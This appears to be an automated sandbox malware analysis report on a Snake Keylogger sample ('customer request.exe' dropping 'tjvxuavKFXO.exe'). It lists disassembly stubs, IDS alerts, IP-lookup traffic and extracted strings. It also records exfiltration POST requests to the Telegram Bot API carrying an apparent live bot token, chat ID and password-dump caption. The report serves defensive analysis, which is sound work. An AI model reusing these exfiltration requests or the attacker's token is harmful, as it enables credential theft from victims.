Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 4x nop then jmp 05251011h	13_2_05250D60
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 4x nop then jmp 0525F009h	13_2_0525ED60
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 4x nop then jmp 0525BBE9h	13_2_0525B940
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 4x nop then jmp 0525F461h	13_2_0525F1B8
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 4x nop then jmp 0525C041h	13_2_0525BD98
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 4x nop then jmp 0525C499h	13_2_0525C1F0
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 4x nop then jmp 0525DEA9h	13_2_0525DC00
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 4x nop then jmp 0525E301h	13_2_0525E058
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 4x nop then jmp 05250751h	13_2_052504A0
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 4x nop then jmp 0525E759h	13_2_0525E4B0
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 4x nop then jmp 0525B791h	13_2_0525B4E8
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 4x nop then jmp 0525D5F9h	13_2_0525D350
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 4x nop then jmp 0525DA51h	13_2_0525D7A8
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 4x nop then jmp 0525F8B9h	13_2_0525F610
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 4x nop then jmp 0525FD11h	13_2_0525FA68
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 4x nop then jmp 0525C8F1h	13_2_0525C648
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 4x nop then jmp 0525CD49h	13_2_0525CAA0
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 4x nop then jmp 0525D1A1h	13_2_0525CEF8
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 4x nop then jmp 06968945h	13_2_06968608
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	13_2_069636CE
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 4x nop then jmp 06966171h	13_2_06965EC8
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 4x nop then jmp 069658C1h	13_2_06965618
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 4x nop then jmp 06965D19h	13_2_06965A70
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	13_2_069633B8
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	13_2_069633A8
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 4x nop then jmp 06966E79h	13_2_06966BD0
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 4x nop then jmp 069665C9h	13_2_06966320
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 4x nop then jmp 06966A21h	13_2_06966778
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 4x nop then jmp 06960741h	13_2_06960498
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 4x nop then jmp 06967751h	13_2_069674A8
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 4x nop then jmp 06960B99h	13_2_069608F0
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 4x nop then jmp 069672FAh	13_2_06967050
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 4x nop then jmp 069602E9h	13_2_06960040
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 4x nop then jmp 06965441h	13_2_06965198
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 4x nop then jmp 06968459h	13_2_069681B0
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 4x nop then jmp 06967BA9h	13_2_06967900
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 4x nop then jmp 06968001h	13_2_06967D58
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 4x nop then jmp 06960FF1h	13_2_06960D48

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:62946 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:62955 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:62955 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:62946 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	TCP traffic: 192.168.2.4:62944 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.4:59873 -> 1.1.1.1:53

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7347885220:AAFmOXgoc0UBDpYJA8OUR6HtUv-Uevo_Ttc/sendDocument?chat_id=6939220311&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd50e17492f410Host: api.telegram.orgContent-Length: 569Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7347885220:AAFmOXgoc0UBDpYJA8OUR6HtUv-Uevo_Ttc/sendDocument?chat_id=6939220311&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5109f061e5eeHost: api.telegram.orgContent-Length: 556Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.16.1 104.21.16.1
Source: Joe Sandbox View	IP Address: 104.21.16.1 104.21.16.1
Source: Joe Sandbox View	IP Address: 193.122.6.168 193.122.6.168

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49741 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49746 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49736 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49744 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49752 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49749 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49742 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49754 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49739 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49758 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49750 -> 104.21.16.1:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49737 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49747 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot7347885220:AAFmOXgoc0UBDpYJA8OUR6HtUv-Uevo_Ttc/sendDocument?chat_id=6939220311&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd50e17492f410Host: api.telegram.orgContent-Length: 569Connection: Keep-Alive

Source: customer request.exe, 00000008.00000002.4137608364.0000000002E72000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002F38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: customer request.exe, 00000008.00000002.4137608364.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D47000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D54000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D62000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D39000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D9E000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E2A000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E0F000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E38000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002D75000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E67000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: customer request.exe, 00000008.00000002.4137608364.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D47000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D54000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D62000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002CE9000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D39000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D9E000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002DC3000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E2A000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E46000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E0F000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E38000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002D75000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E67000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: customer request.exe, 00000008.00000002.4137608364.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: customer request.exe, 00000000.00000002.1722509797.0000000004D1D000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4133954704.000000000041B000.00000040.00000400.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000A.00000002.1763910283.0000000004B99000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000A.00000002.1763910283.0000000004C7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: customer request.exe, tjvxuavKFXO.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: customer request.exe, tjvxuavKFXO.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: customer request.exe, tjvxuavKFXO.exe.0.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: customer request.exe, 00000008.00000002.4137608364.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D47000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D54000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D62000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D39000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D9E000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E2A000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E0F000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E38000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E67000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E1C000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002D98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: customer request.exe, 00000000.00000002.1721290300.000000000328A000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000A.00000002.1760824338.00000000033B0000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: customer request.exe, 00000000.00000002.1725057082.0000000007242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: customer request.exe, 00000000.00000002.1725057082.0000000007242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: customer request.exe, 00000000.00000002.1725057082.0000000007242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: customer request.exe, 00000000.00000002.1725057082.0000000007242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: customer request.exe, 00000000.00000002.1725057082.0000000007242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: customer request.exe, 00000000.00000002.1725057082.0000000007242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: customer request.exe, 00000000.00000002.1725057082.0000000007242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: customer request.exe, 00000000.00000002.1725057082.0000000007242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
